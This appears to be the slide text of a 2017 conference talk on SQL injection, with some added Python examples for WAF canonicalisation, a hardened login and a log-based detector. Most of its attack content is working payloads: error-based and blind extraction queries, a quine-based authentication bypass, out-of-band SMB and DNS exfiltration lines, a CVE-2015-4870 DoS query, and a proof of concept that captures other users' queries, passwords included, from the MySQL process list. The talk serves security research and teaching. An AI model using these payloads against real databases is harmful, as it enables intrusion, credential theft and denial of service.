Look at those who dismiss web hacking 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM
SQL Injection: the threat that isn't over 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM
Who am I: 정도원 aka rubiya, Penetration tester, Web application bug hunter, Pwned 20+ wargames, @kr_rubiya, Jobless
How to find vulnerability? How to exploit vulnerability? Exploit more smartly MITM SQL Injection
What is SQL Injection
  SELECT * FROM users WHERE name = '" + username + "';
  SELECT * FROM users WHERE name = 'FooBar';
  SELECT * FROM users WHERE name = '1' OR '1' = '1';
Easy to access
NT Web Technology Vulnerabilities
But
Why hard to prevent
How to find sqli vuln?
How about AEG?
How to find sqli vuln?
Indirect SQL Injection
Web Application Firewall: an attack-blocking solution developed to protect web applications
Web Application Firewall: a pattern-based firewall
  Pattern = or 1 = 1 / and 1 = 1 / 1 = 1
  Input: or 2 = 2
  Pattern = or 1 = 1 / and 1 = 1 / 1 = 1 / or 2 = 2
  Input: or 3 = 3
Web Application Firewall: in ASP, when a % escape falls outside the %[00-FF] range the % is ignored
  ?id= UN%ION SE%LECT 1--;   ->   ?id= UNION SELECT 1--;
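As an added example (not from the talk), this Python models the slide's ASP behaviour of discarding a % that does not form a valid %XX escape, and compares a WAF that matches its signatures on the raw parameter with one that canonicalises the value the way the backend will before matching. The decode routine is an assumption that follows the slide's description, not a verified ASP implementation; the signature list is constructed.

```python
import re

# Signature list in the spirit of the slide's pattern-based WAF (constructed).
SIGNATURES = [re.compile(p, re.IGNORECASE) for p in (
    r"\bor\s+1\s*=\s*1\b",
    r"\band\s+1\s*=\s*1\b",
    r"\bunion\s+select\b",
)]

HEX = set("0123456789abcdefABCDEF")

def asp_like_decode(s: str) -> str:
    """Model of the decoding the slide attributes to ASP: '%XX' with two hex
    digits becomes that byte; any other '%' is simply dropped (assumption)."""
    out = []
    i = 0
    while i < len(s):
        if s[i] == "%":
            pair = s[i + 1:i + 3]
            if len(pair) == 2 and all(ch in HEX for ch in pair):
                out.append(chr(int(pair, 16)))
                i += 3
            else:
                i += 1          # invalid escape: the '%' vanishes, rest is kept
            continue
        out.append(s[i])
        i += 1
    return "".join(out)

def matches_raw(value: str) -> bool:
    """Naive WAF: signatures are matched against the parameter as received."""
    return any(sig.search(value) for sig in SIGNATURES)

def matches_canonical(value: str) -> bool:
    """Hardened WAF: canonicalise exactly as the backend will, then match."""
    return any(sig.search(asp_like_decode(value)) for sig in SIGNATURES)

if __name__ == "__main__":
    payload = "UN%ION SE%LECT 1--;"        # the slide's example parameter value
    print(asp_like_decode(payload))        # UNION SELECT 1--;
    print(matches_raw(payload), matches_canonical(payload))   # False True
```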
SQL Injection + DDOS?
How to exploit vulnerability?
  Classic SQL Injection
  Blind SQL Injection
  Error Based SQL Injection
  Error Based Blind SQL Injection
  Time Based Blind SQL Injection
Error Based SQL Injection: possible when error messages are displayed to the client; a technique that gets the desired value included in the error message; the method differs per DBMS
Error Based SQL Injection - MSSQL
Error Based SQL Injection - MySQL
  Duplicate entry:                  1 group by mid(version(),rand())having min(1)#
  XPATH syntax error:               updatexml(0,concat(0xa,version()),0)#
  BIGINT value is out of range in:  --~(select*from(select@@version)f)#
Error Based Blind SQL Injection: used when the True/False of the query result cannot be observed; possible when an error makes the application take its exception-handling path, so error versus no error is distinguishable
Error Based Blind SQL Injection
  ascii(substr((select pw from users),1,1))=97
  select(select 96 union select ascii(substr((select pw from users),1,1)))   -> 96,97 returned -> error (the scalar subquery returns more than one row)
  select(select 97 union select ascii(substr((select pw from users),1,1)))   -> 97 returned (UNION removes the duplicate) -> no error
Time Based Blind SQL Injection
  MySQL:  sleep(), benchmark()
  MSSQL:  waitfor delay, waitfor time
  Oracle: dbms_lock.sleep()
Compounded SQL Injection
  SQLi + XSS
  SQLi + Authentication Bypass
  Out Of Band SQLi
SQLi + XSS: when INSERT or UPDATE is possible, chain into Stored XSS; browser 1-day attacks delivered through iframe tags were in fashion
  INSERT INTO board(no,user,<script>evilcode</script>)
  UPDATE board SET content=<script>evilcode</script>
SQLi + Authentication Bypass: Union SQL Injection; authentication bypass via a recursive return value
Union SQL Injection: Object Injection, SSRF, XML External Entity, LFI / RFI
Authentication bypass via a recursive return value
  s = 's = %r\nprint(s%%s)'
  print(s%s)
  SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine
  if(queryresult)   ->   if(queryresult == input) loginsuccess()
  (login succeeds only when the value the query returns equals the submitted input, so the injected query has to reproduce its own text: a quine)
  ?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\ '\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))-- ',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--
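As an added example (not from the talk), a Python login routine that removes both weaknesses the slides rely on: the query is parameterised instead of concatenated, and the check compares a stored PBKDF2 verifier with one derived from the submitted password rather than trusting `queryresult == input`. The schema, the salt handling and the guest123/mypass666 account (borrowed from the sniffing slide) are constructed for this example.

```python
import hashlib
import hmac
import os
import sqlite3

def vulnerable_query(user_id: str) -> str:
    """The shape the slides attack: SQL built by concatenation, after which the
    application trusts `queryresult == input` as the login check. Returned as a
    string only; it is never executed here."""
    return "SELECT pw FROM users WHERE id='" + user_id + "'"

def derive(pw: str, salt: bytes) -> bytes:
    """Password verifier; PBKDF2-HMAC-SHA256 with 200k rounds for this example."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 200_000)

def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table holding the deck's guest123 account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES(?,?,?)",
                 ("guest123", salt, derive("mypass666", salt)))
    return conn

def login_hardened(conn: sqlite3.Connection, user_id: str, pw: str) -> bool:
    """Parameterised lookup. The returned row is never compared with user input,
    only with a verifier derived from it, so a UNION that supplies its own
    'answer' row cannot satisfy the check."""
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE id=?",
                       (user_id,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, derive(pw, salt))

if __name__ == "__main__":
    db = make_db()
    print(login_hardened(db, "guest123", "mypass666"))                 # True
    print(login_hardened(db, "asd' union select 1,'admin'-- ", "x"))  # False
```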
Out Of Band SQLi: sending packets to an external server; accessing files on the internal network; DoS against the SQL server
Out Of Band SQLi
  DNS Query:        UTL_HTTP.REQUEST('http://' || (select ) || '.mydomain');
  Access SMB file:  load_file('\\\\192.168.0.101\\aa');
DoS against the DBMS: BENCHMARK(), Heavy Query, CVE-2015-4870
  CVE-2015-4870: select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
Lord of SQL Injection
Exploit more smartly
  Bitwise operation Blind SQL Injection
  UPDATE, INSERT Blind SQL Injection without modifying data
  MITM SQL Injection
Drawbacks of Blind SQL Injection: it is slow; it leaves a lot of logs.
Bitwise operation Blind SQL Injection
  ascii(substr((select pw from users),1,1))=97
  substr(lpad(bin(ascii(substr((select pw from users),1,1))),8,0),1,1) = 1
  substr(lpad(bin(97),8,0),1,1) = 1
  substr(lpad(1100001,8,0),1,1) = 1      -- bin(97) = 1100001
  substr(01100001,1,1) = 1
  substr(lpad(bin(ascii(substr((select pw from users),1,1))),7,0),1,1)   -- 7 bits cover ASCII; the '0'/'1' result is already a boolean, one bit per request
MITM SQL Injection Information_schema.processlist.info
Sniff Query?
  Sign-up: insert into users values('guest123',md5('mypass666'))
  Login:   select...where id='guest123' and pw=md5('mypass666')
But
If sniffing it yourself is too slow, make the DBMS do it!  BENCHMARK(count,expr)  @var_name := expr
SELECT benchmark(9999999, @query:=concat( @query,(select info from information_schema.processlist) ) )
Issues: when the same value is queried repeatedly the query result is cached; with only the SELECT privilege the cache cannot be turned off; a query seen once is then collected countless times
Proof of Concept
  SELECT @query:=0x3a3a
  UNION SELECT @tmp:=0x20
  UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*mitm_sqli_pwn*/))^(if((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0 )))
  UNION SELECT @query limit 3,1
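As an added defender-side example (not from the talk), the following Python scans MySQL general-log Query lines for the statement shapes the deck covers: the processlist-plus-BENCHMARK combination behind the MITM SQLi PoC, the PROCEDURE ANALYSE DoS (CVE-2015-4870), updatexml / group-by-rand error-based probes, UNC-path load_file() out-of-band reads, and sleep()/benchmark() timing. The log excerpt, rule names and regexes are constructed for this example.

```python
import re

# One rule per technique named in the deck; every regex in a rule must match.
# Rule names and patterns are constructed for this example, not from the talk.
RULES = {
    "mitm_processlist": [r"information_schema\.processlist", r"\bbenchmark\s*\("],
    "dos_procedure_analyse": [r"\bprocedure\s+analyse\s*\("],     # CVE-2015-4870 shape
    "error_based": [r"\bupdatexml\s*\(|\bgroup\s+by\b.*\brand\s*\("],
    "oob_smb_load_file": [r"load_file\s*\(\s*['\"]\\\\"],          # UNC path argument
    "time_based": [r"\b(sleep|benchmark)\s*\("],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in RULES.items()}

# MySQL general-log "Query" record: <timestamp> <thread id> Query <sql>
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")

def classify(sql: str) -> list:
    """Sorted technique names whose rules all match the statement."""
    return sorted(name for name, pats in COMPILED.items()
                  if all(p.search(sql) for p in pats))

def scan(lines) -> list:
    """(thread_id, techniques) for every Query line that fires at least one rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        tags = classify(m.group(2))
        if tags:
            hits.append((int(m.group(1)), tags))
    return hits

# Constructed general-log excerpt: one benign query, then one line per technique.
SAMPLE_LOG = r"""
2017-07-10T10:00:01.000000Z    12 Query SELECT * FROM users WHERE name = 'guest123'
2017-07-10T10:00:02.000000Z    13 Query SELECT benchmark(500000,(SELECT group_concat(info) FROM information_schema.processlist))
2017-07-10T10:00:03.000000Z    14 Query select * from information_schema.tables procedure analyse((select*from(select 1)x),1)
2017-07-10T10:00:04.000000Z    15 Query SELECT 1 FROM users WHERE id=1 and updatexml(0,concat(0xa,version()),0)
2017-07-10T10:00:05.000000Z    16 Query SELECT load_file('\\\\192.168.0.101\\aa')
2017-07-10T10:00:06.000000Z    17 Query SELECT * FROM board WHERE no=3 and sleep(5)
""".strip().splitlines()

if __name__ == "__main__":
    for thread_id, tags in scan(SAMPLE_LOG):
        print(thread_id, ", ".join(tags))
```

The processlist rule is the one worth alerting on by itself: ordinary application code has no reason to read information_schema.processlist inside a BENCHMARK loop.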
Thank You RUBIYA805@GMAIL.COM